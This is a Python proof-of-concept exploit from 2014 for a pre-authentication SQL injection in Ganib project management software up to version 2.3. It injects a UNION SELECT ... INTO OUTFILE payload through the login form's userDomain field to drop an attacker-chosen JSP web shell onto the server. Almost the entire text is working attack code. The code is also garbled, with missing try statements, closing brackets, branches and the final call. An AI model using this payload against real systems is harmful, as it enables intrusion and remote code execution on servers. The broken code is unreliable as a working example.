# Exploit title: Ganib 2.x SQLi
# Date: 02/02/2014
# Exploit author: drone (@dronesec)
# More information: http://forelsec.blogspot.com/2014/02/ganib-project-management-23-multiple.html
# Vendor homepage: http://www.ganib.com/
# Software link: http://downloads.sourceforge.net/project/ganib/Ganib-2.0/Ganib-2.0_with_jre.zip
# Version: <= 2.3
# Fixed in: 2.4
# Tested on: Ubuntu 12.04 (apparmor disabled) / WinXP SP3
from argparse import ArgumentParser
import sys
import string
import random
import requests
""" Ganib 2.0 preauth SQLi PoC
def loadJSP(options):
data = ''
with open(options.jsp) as f:
for line in f.readlines():
data += line.replace("\"", "\\\"").replace('\n', '')
except Exception, e:
print e
return data
def run(options):
print '[!] Dropping %s on %s...' % (options.jsp, options.ip)
url = "http://{0}:8080/LoginProcessing.jsp".format(options.ip)
shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
exploit = '1 UNION SELECT "{0}","1","2","3" INTO OUTFILE "{1}"'
exploit = exploit.format(loadJSP(options), options.path + '/%s.jsp' % shell)
data = { "theAction" : "submit",
"J_USERNAME" : "test",
"J_PASSWORD" : "test",
"language" : "en",
"remember_checkbox" : "on",
"userDomain" : exploit
res = requests.post(url, data=data)
if res.status_code is 200:
print '[!] Dropped at /{0}.jsp'.format(shell)
print '[!] Failed to drop JSP (HTTP {0})'.format(res.status_code)
def parse():
parser = ArgumentParser()
parser.add_argument("-i", help='Server ip address', action='store', dest='ip',
parser.add_argument("-p", help='Writable web path (/var/www/ganib)', dest='path',
action='store', default='/var/www/ganib')
parser.add_argument("-j", help="JSP to deploy", dest='jsp', action='store')
options = parser.parse_args()
options.path = options.path if options.path[-1] != '/' else options.path[:-1]
return options
if __name__ == "__main__":